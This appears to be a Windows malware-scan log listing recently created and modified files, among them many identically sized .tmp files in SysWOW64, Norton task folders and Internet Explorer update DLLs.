2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00001150.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00000900.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00000467.tmp
2016-08-30 10:20 - 2016-08-30 10:20 - 01315432 ____T C:\Windows\SysWOW64\00000053.tmp
2016-08-30 10:19 - 2016-08-30 10:19 - 01315432 ____T C:\Windows\SysWOW64\00031673.tmp
2016-08-30 10:19 - 2016-08-30 10:19 - 01315432 ____T C:\Windows\SysWOW64\00028745.tmp
2016-08-30 10:19 - 2016-08-30 10:19 - 01315432 ____T C:\Windows\SysWOW64\00026924.tmp
2016-08-30 10:19 - 2016-08-30 10:19 - 01315432 ____T C:\Windows\SysWOW64\00022386.tmp
2016-08-30 10:19 - 2016-08-30 10:19 - 01315432 ____T C:\Windows\SysWOW64\00019072.tmp
2016-08-30 10:19 - 2016-08-30 10:19 - 01315432 ____T C:\Windows\SysWOW64\00006270.tmp
2016-08-30 10:19 - 2016-08-30 10:19 - 01315432 ____T C:\Windows\SysWOW64\00005829.tmp
2016-08-30 10:19 - 2016-08-30 10:19 - 01315432 ____T C:\Windows\SysWOW64\00005021.tmp
2016-08-30 10:18 - 2016-08-30 10:18 - 01315432 ____T C:\Windows\SysWOW64\00032757.tmp
2016-08-30 10:18 - 2016-08-30 10:18 - 01315432 ____T C:\Windows\SysWOW64\00032439.tmp
2016-08-30 10:18 - 2016-08-30 10:18 - 01315432 ____T C:\Windows\SysWOW64\00031101.tmp
2016-08-30 10:18 - 2016-08-30 10:18 - 01315432 ____T C:\Windows\SysWOW64\00030106.tmp
2016-08-30 10:18 - 2016-08-30 10:18 - 01315432 ____T C:\Windows\SysWOW64\00028703.tmp
2016-08-30 10:18 - 2016-08-30 10:18 - 01315432 ____T C:\Windows\SysWOW64\00028253.tmp
2016-08-30 10:18 - 2016-08-30 10:18 - 01315432 ____T C:\Windows\SysWOW64\00026308.tmp
2016-08-30 10:18 - 2016-08-30 10:18 - 01315432 ____T C:\Windows\SysWOW64\00026299.tmp
2016-08-30 10:18 - 2016-08-30 10:18 - 01315432 ____T C:\Windows\SysWOW64\00025667.tmp
2016-08-30 10:18 - 2016-08-30 10:18 - 01315432 ____T C:\Windows\SysWOW64\00024626.tmp
2016-08-30 10:18 - 2016-08-30 10:18 - 01315432 ____T C:\Windows\SysWOW64\00024393.tmp
2016-08-30 10:18 - 2016-08-30 10:18 - 01315432 ____T C:\Windows\SysWOW64\00024084.tmp
2016-08-30 10:18 - 2016-08-30 10:18 - 01315432 ____T C:\Windows\SysWOW64\00023811.tmp
2016-08-30 10:18 - 2016-08-30 10:18 - 01315432 ____T C:\Windows\SysWOW64\00023805.tmp
2016-08-30 10:18 - 2016-08-30 10:18 - 01315432 ____T C:\Windows\SysWOW64\00022929.tmp
2016-08-30 10:18 - 2016-08-30 10:18 - 01315432 ____T C:\Windows\SysWOW64\00021538.tmp
2016-08-30 10:18 - 2016-08-30 10:18 - 01315432 ____T C:\Windows\SysWOW64\00020037.tmp
2016-08-30 10:18 - 2016-08-30 10:18 - 01315432 ____T C:\Windows\SysWOW64\00019954.tmp
2016-08-30 10:18 - 2016-08-30 10:18 - 01315432 ____T C:\Windows\SysWOW64\00019912.tmp
2016-08-30 10:18 - 2016-08-30 10:18 - 01315432 ____T C:\Windows\SysWOW64\00019629.tmp
2016-08-30 10:18 - 2016-08-30 10:18 - 01315432 ____T C:\Windows\SysWOW64\00019264.tmp
2016-08-30 10:18 - 2016-08-30 10:18 - 01315432 ____T C:\Windows\SysWOW64\00018756.tmp
2016-08-30 10:18 - 2016-08-30 10:18 - 01315432 ____T C:\Windows\SysWOW64\00017035.tmp
2016-08-30 10:18 - 2016-08-30 10:18 - 01315432 ____T C:\Windows\SysWOW64\00016944.tmp
2016-08-30 10:18 - 2016-08-30 10:18 - 01315432 ____T C:\Windows\SysWOW64\00016118.tmp
2016-08-30 10:18 - 2016-08-30 10:18 - 01315432 ____T C:\Windows\SysWOW64\00015890.tmp
2016-08-30 10:18 - 2016-08-30 10:18 - 01315432 ____T C:\Windows\SysWOW64\00015350.tmp
2016-08-30 10:18 - 2016-08-30 10:18 - 01315432 ____T C:\Windows\SysWOW64\00013931.tmp
2016-08-30 10:18 - 2016-08-30 10:18 - 01315432 ____T C:\Windows\SysWOW64\00012859.tmp
2016-08-30 10:18 - 2016-08-30 10:18 - 01315432 ____T C:\Windows\SysWOW64\00012623.tmp
2016-08-30 10:18 - 2016-08-30 10:18 - 01315432 ____T C:\Windows\SysWOW64\00011840.tmp
2016-08-30 10:18 - 2016-08-30 10:18 - 01315432 ____T C:\Windows\SysWOW64\00011538.tmp
2016-08-30 10:18 - 2016-08-30 10:18 - 01315432 ____T C:\Windows\SysWOW64\00011323.tmp
2016-08-30 10:18 - 2016-08-30 10:18 - 01315432 ____T C:\Windows\SysWOW64\00009894.tmp
2016-08-30 10:18 - 2016-08-30 10:18 - 01315432 ____T C:\Windows\SysWOW64\00009741.tmp
2016-08-30 10:18 - 2016-08-30 10:18 - 01315432 ____T C:\Windows\SysWOW64\00009040.tmp
2016-08-30 10:18 - 2016-08-30 10:18 - 01315432 ____T C:\Windows\SysWOW64\00008942.tmp
2016-08-30 10:18 - 2016-08-30 10:18 - 01315432 ____T C:\Windows\SysWOW64\00008723.tmp
2016-08-30 10:18 - 2016-08-30 10:18 - 01315432 ____T C:\Windows\SysWOW64\00007376.tmp
2016-08-30 10:18 - 2016-08-30 10:18 - 01315432 ____T C:\Windows\SysWOW64\00006729.tmp
2016-08-30 10:18 - 2016-08-30 10:18 - 01315432 ____T C:\Windows\SysWOW64\00005537.tmp
2016-08-30 10:18 - 2016-08-30 10:18 - 01315432 ____T C:\Windows\SysWOW64\00004966.tmp
2016-08-30 10:18 - 2016-08-30 10:18 - 01315432 ____T C:\Windows\SysWOW64\00004664.tmp
2016-08-30 10:18 - 2016-08-30 10:18 - 01315432 ____T C:\Windows\SysWOW64\00003548.tmp
2016-08-30 10:18 - 2016-08-30 10:18 - 01315432 ____T C:\Windows\SysWOW64\00003035.tmp
2016-08-30 10:18 - 2016-08-30 10:18 - 01315432 ____T C:\Windows\SysWOW64\00002082.tmp
2016-08-30 10:18 - 2016-08-30 10:18 - 01315432 ____T C:\Windows\SysWOW64\00001869.tmp
2016-08-30 10:18 - 2016-08-30 10:18 - 01315432 ____T C:\Windows\SysWOW64\00001842.tmp
2016-08-30 10:18 - 2016-08-30 10:18 - 01315432 ____T C:\Windows\SysWOW64\00000778.tmp
2016-08-30 10:17 - 2016-08-30 10:17 - 01315432 ____T C:\Windows\SysWOW64\00032391.tmp
2016-08-30 10:17 - 2016-08-30 10:17 - 01315432 ____T C:\Windows\SysWOW64\00029358.tmp
2016-08-30 10:17 - 2016-08-30 10:17 - 01315432 ____T C:\Windows\SysWOW64\00028145.tmp
2016-08-30 10:17 - 2016-08-30 10:17 - 01315432 ____T C:\Windows\SysWOW64\00026962.tmp
2016-08-30 10:17 - 2016-08-30 10:17 - 01315432 ____T C:\Windows\SysWOW64\00026500.tmp
2016-08-30 10:17 - 2016-08-30 10:17 - 01315432 ____T C:\Windows\SysWOW64\00024464.tmp
2016-08-30 10:17 - 2016-08-30 10:17 - 01315432 ____T C:\Windows\SysWOW64\00023281.tmp
2016-08-30 10:17 - 2016-08-30 10:17 - 01315432 ____T C:\Windows\SysWOW64\00021726.tmp
2016-08-30 10:17 - 2016-08-30 10:17 - 01315432 ____T C:\Windows\SysWOW64\00019895.tmp
2016-08-30 10:17 - 2016-08-30 10:17 - 01315432 ____T C:\Windows\SysWOW64\00019718.tmp
2016-08-30 10:17 - 2016-08-30 10:17 - 01315432 ____T C:\Windows\SysWOW64\00019169.tmp
2016-08-30 10:17 - 2016-08-30 10:17 - 01315432 ____T C:\Windows\SysWOW64\00018716.tmp
2016-08-30 10:17 - 2016-08-30 10:17 - 01315432 ____T C:\Windows\SysWOW64\00018467.tmp
2016-08-30 10:17 - 2016-08-30 10:17 - 01315432 ____T C:\Windows\SysWOW64\00017421.tmp
2016-08-30 10:17 - 2016-08-30 10:17 - 01315432 ____T C:\Windows\SysWOW64\00016827.tmp
2016-08-30 10:17 - 2016-08-30 10:17 - 01315432 ____T C:\Windows\SysWOW64\00015724.tmp
2016-08-30 10:17 - 2016-08-30 10:17 - 01315432 ____T C:\Windows\SysWOW64\00014771.tmp
2016-08-30 10:17 - 2016-08-30 10:17 - 01315432 ____T C:\Windows\SysWOW64\00014604.tmp
2016-08-30 10:17 - 2016-08-30 10:17 - 01315432 ____T C:\Windows\SysWOW64\00012382.tmp
2016-08-30 10:17 - 2016-08-30 10:17 - 01315432 ____T C:\Windows\SysWOW64\00011942.tmp
2016-08-30 10:17 - 2016-08-30 10:17 - 01315432 ____T C:\Windows\SysWOW64\00011478.tmp
2016-08-30 10:17 - 2016-08-30 10:17 - 01315432 ____T C:\Windows\SysWOW64\00009961.tmp
2016-08-30 10:17 - 2016-08-30 10:17 - 01315432 ____T C:\Windows\SysWOW64\00006334.tmp
2016-08-30 10:17 - 2016-08-30 10:17 - 01315432 ____T C:\Windows\SysWOW64\00005705.tmp
2016-08-30 10:17 - 2016-08-30 10:17 - 01315432 ____T C:\Windows\SysWOW64\00005447.tmp
2016-08-30 10:17 - 2016-08-30 10:17 - 01315432 ____T C:\Windows\SysWOW64\00005436.tmp
2016-08-30 10:17 - 2016-08-30 10:17 - 01315432 ____T C:\Windows\SysWOW64\00004827.tmp
2016-08-30 10:17 - 2016-08-30 10:17 - 01315432 ____T C:\Windows\SysWOW64\00003902.tmp
2016-08-30 10:17 - 2016-08-30 10:17 - 01315432 ____T C:\Windows\SysWOW64\00002995.tmp
2016-08-30 10:17 - 2016-08-30 10:17 - 01315432 ____T C:\Windows\SysWOW64\00000491.tmp
2016-08-30 10:17 - 2016-08-30 10:17 - 01315432 ____T C:\Windows\SysWOW64\00000292.tmp
2016-08-30 10:17 - 2016-08-30 10:17 - 01315432 ____T C:\Windows\SysWOW64\00000153.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00032459.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00032422.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00032115.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00031977.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00031849.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00031699.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00031652.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00031470.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00031388.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00030719.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00030176.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00029479.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00028723.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00028382.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00027877.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00027604.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00027066.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00025715.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00024442.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00024434.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00023840.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00023357.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00023086.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00022648.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00022193.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00021260.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00021199.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00020755.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00020607.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00020454.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00020321.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00018428.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00017933.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00017776.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00017318.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00017218.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00016999.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00016703.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00015760.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00015426.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00015190.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00014717.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00014547.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00014527.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00014240.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00011936.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00011767.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00011736.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00011708.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00011443.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00011269.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00011212.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00011178.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00010951.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00010851.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00010474.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00010138.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00008308.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00007356.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00007204.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00005922.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00005919.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00005611.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00005321.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00005033.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00005004.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00004887.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00004624.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00004545.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00004469.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00004260.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00003710.tmp
2016-08-27 15:48 - 2016-08-27 15:48 - 01315432 ____T C:\Windows\SysWOW64\00003138.tmp
2016-08-27 15:17 - 2016-08-27 15:17 - 00000000 ____D C:\Windows\System32\Tasks\Norton 360
2016-08-27 15:12 - 2016-08-27 15:12 - 00003228 _____ C:\Windows\System32\Tasks\Norton WSC Integration
2016-08-24 16:15 - 2008-02-06 20:57 - 00114688 _____ (Viewpoint Corporation) C:\Users\JHS-JJS\AppData\LocalLow\vmpremov.exe
2016-08-21 13:34 - 2016-08-05 13:56 - 00728356 _____ C:\Windows\ntbtlog.txt
2016-08-14 10:44 - 2008-01-20 22:50 - 00363008 _____ (Microsoft Corporation) C:\Windows\system32\cmd - Copy.exe
2016-08-12 13:26 - 2016-08-12 13:26 - 45702448 _____ C:\Users\JHS-JJS\Downloads\Firefox Setup 43.0.1 (6).exe
2016-08-09 12:37 - 2016-08-09 12:37 - 01204056 _____ (Symantec Corporation) C:\Users\JHS-JJS\Downloads\AutoDetectPkg.exe
2016-08-02 10:56 - 2016-06-10 10:45 - 02802176 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2016-08-02 10:47 - 2016-06-25 12:04 - 00792064 _____ (Microsoft Corporation) C:\Windows\system32\localspl.dll
2016-08-02 10:47 - 2016-06-25 12:04 - 00686080 _____ (Microsoft Corporation) C:\Windows\system32\win32spl.dll
2016-08-02 10:47 - 2016-06-25 12:04 - 00261120 _____ (Microsoft Corporation) C:\Windows\system32\ntprint.dll
2016-08-02 10:47 - 2016-06-25 12:03 - 00161280 _____ (Microsoft Corporation) C:\Windows\system32\inetpp.dll
2016-08-02 10:47 - 2016-06-25 12:03 - 00018432 _____ (Microsoft Corporation) C:\Windows\system32\inetppui.dll
2016-08-02 10:47 - 2016-06-25 11:37 - 00626176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\localspl.dll
2016-08-02 10:47 - 2016-06-25 11:37 - 00443904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\win32spl.dll
2016-08-02 10:47 - 2016-06-25 11:37 - 00216064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntprint.dll
2016-08-02 10:47 - 2016-06-25 11:09 - 00061440 _____ (Microsoft Corporation) C:\Windows\system32\ntprint.exe
2016-08-02 10:47 - 2016-06-25 11:09 - 00048128 _____ (Microsoft Corporation) C:\Windows\system32\wpnpinst.exe
2016-08-02 10:47 - 2016-06-25 10:40 - 00061440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntprint.exe
2016-08-01 22:29 - 2016-06-20 14:24 - 18804736 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2016-08-01 22:29 - 2016-06-20 14:21 - 02351616 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2016-08-01 22:29 - 2016-06-20 14:16 - 10940416 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2016-08-01 22:29 - 2016-06-20 14:15 - 01389056 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2016-08-01 22:29 - 2016-06-20 14:15 - 00448512 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2016-08-01 22:29 - 2016-06-20 14:14 - 02159104 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2016-08-01 22:29 - 2016-06-20 14:14 - 01392640 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2016-08-01 22:29 - 2016-06-20 14:14 - 00579584 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2016-08-01 22:29 - 2016-06-20 14:13 - 02382848 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2016-08-01 22:29 - 2016-06-20 14:13 - 01494528 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2016-08-01 22:29 - 2016-06-20 14:13 - 00816640 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2016-08-01 22:29 - 2016-06-20 14:13 - 00729088 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2016-08-01 22:29 - 2016-06-20 14:13 - 00452608 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2016-08-01 22:29 - 2016-06-20 14:13 - 00281600 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2016-08-01 22:29 - 2016-06-20 14:13 - 00248320 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2016-08-01 22:29 - 2016-06-20 14:13 - 00237056 _____ (Microsoft Corporation) C:\Windows\system32\url.dll
2016-08-01 22:29 - 2016-06-20 14:13 - 00173568 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2016-08-01 22:29 - 2016-06-20 14:13 - 00096256 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2016-08-01 22:29 - 2016-06-20 14:13 - 00086016 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2016-08-01 22:29 - 2016-06-20 14:13 - 00055296 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll
2016-08-01 22:29 - 2016-06-20 14:13 - 00012800 _____ (Microsoft Corporation) C:\Windows\system32\mshta.exe
2016-08-01 22:29 - 2016-06-20 14:13 - 00011264 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe
2016-08-01 22:29 - 2016-06-20 13:50 - 01815552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2016-08-01 22:29 - 2016-06-20 13:48 - 12842496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2016-08-01 22:29 - 2016-06-20 13:46 - 00367616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2016-08-01 22:29 - 2016-06-20 13:45 - 09755136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2016-08-01 22:29 - 2016-06-20 13:45 - 01140224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2016-08-01 22:29 - 2016-06-20 13:44 - 01129984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2016-08-01 22:29 - 2016-06-20 13:43 - 01804800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2016-08-01 22:29 - 2016-06-20 13:43 - 01427968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2016-08-01 22:29 - 2016-06-20 13:43 - 00719360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2016-08-01 22:29 - 2016-06-20 13:43 - 00425472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2016-08-01 22:29 - 2016-06-20 13:43 - 00231936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\url.dll
2016-08-01 22:29 - 2016-06-20 13:43 - 00142848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2016-08-01 22:29 - 2016-06-20 13:43 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2016-08-01 22:29 - 2016-06-20 13:42 - 02382848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2016-08-01 22:29 - 2016-06-20 13:42 - 00607744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2016-08-01 22:29 - 2016-06-20 13:42 - 00354304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2016-08-01 22:29 - 2016-06-20 13:42 - 00223744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2016-08-01 22:29 - 2016-06-20 13:42 - 00176640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2016-08-01 22:29 - 2016-06-20 13:42 - 00072704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2016-08-01 22:29 - 2016-06-20 13:42 - 00041472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedsbs.dll
2016-08-01 22:29 - 2016-06-20 13:42 - 00011776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshta.exe
2016-08-01 22:29 - 2016-06-20 13:42 - 00010752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedssync.exe

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-08-30 10:37 - 2016-06-28 11:18 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-08-30 10:35 - 2010-04-18 02:53 - 00000894 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2016-08-30 10:35 - 2008-09-22 10:10 - 00000288 _____ C:\Windows\Tasks\RtlNICDiagVistaStart.job
2016-08-30 10:35 - 2006-11-02 11:42 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-08-30 10:35 - 2006-11-02 11:22 - 00003616 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2016-08-30 10:35 - 2006-11-02 11:22 - 00003616 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2016-08-30 10:34 - 2006-11-02 11:42 - 00032560 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2016-08-30 10:28 - 2010-04-18 02:53 - 00000898 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2016-08-30 10:07 - 2006-11-02 09:33 - 00000000 ____D C:\Windows\inf
2016-08-30 10:07 - 2006-11-02 08:46 - 00832852 _____ C:\Windows\system32\PerfStringBackup.INI
2016-08-27 16:43 - 2008-10-28 14:36 - 00000000 ___RD C:\Users\JHS-JJS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup(233)
2016-08-27 15:29 - 2016-07-03 14:50 - 00000000 ____D C:\Windows\System32\Tasks\Remediation
2016-08-27 15:27 - 2013-01-15 21:57 - 00000000 ____D C:\Users\JHS-JJS\AppData\Local\NPE
2016-08-27 15:12 - 2016-07-03 14:34 - 00002060 _____ C:\Users\Public\Desktop\Norton 360.lnk
2016-08-27 15:12 - 2015-08-05 09:01 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Norton Security Suite
2016-08-27 15:12 - 2015-03-04 11:37 - 00000000 ____D C:\Windows\system32\Drivers\N360x64
2016-08-27 11:50 - 2016-06-16 15:22 - 00000000 ____D C:\Users\JHS-JJS\AppData\Local\MigWiz
2016-08-27 10:08 - 2009-10-08 18:40 - 00000000 ____D C:\Program Files\Google
2016-08-27 10:08 - 2008-11-22 16:22 - 00000000 ____D C:\Program Files (x86)\Google
2016-08-26 15:29 - 2008-11-22 16:57 - 00000000 ____D C:\Users\JHS-JJS\AppData\Local\Google
2016-08-26 14:28 - 2011-02-19 10:11 - 00000000 ____D C:\Users\JHS-JJS\AppData\Roaming\Mozilla
2016-08-26 14:28 - 2008-11-22 16:22 - 00000000 ____D C:\ProgramData\Google
2016-08-26 14:26 - 2008-11-22 16:24 - 00000000 ____D C:\Program Files (x86)\Adobe
2016-08-26 14:26 - 2008-09-22 10:16 - 00000000 ____D C:\ProgramData\Adobe
2016-08-26 13:56 - 2009-04-30 10:38 - 00000000 ____D C:\Users\JHS-JJS\.gimp-2.6
2016-08-24 16:15 - 2008-10-28 16:50 - 00000000 ____D C:\ProgramData\Viewpoint
2016-08-21 13:50 - 2008-10-29 16:44 - 00000680 _____ C:\Users\JHS-JJS\AppData\Local\d3d9caps.dat
2016-08-21 13:35 - 2016-07-30 10:36 - 00000000 ____D C:\NPE
2016-08-19 16:15 - 2009-06-01 13:12 - 00000000 ____D C:\Users\JHS-JJS\Desktop\DUCKIES
2016-08-14 11:50 - 2011-06-04 22:00 - 00000000 ____D C:\Users\JHS-JJS\AppData\Local\CrashDumps
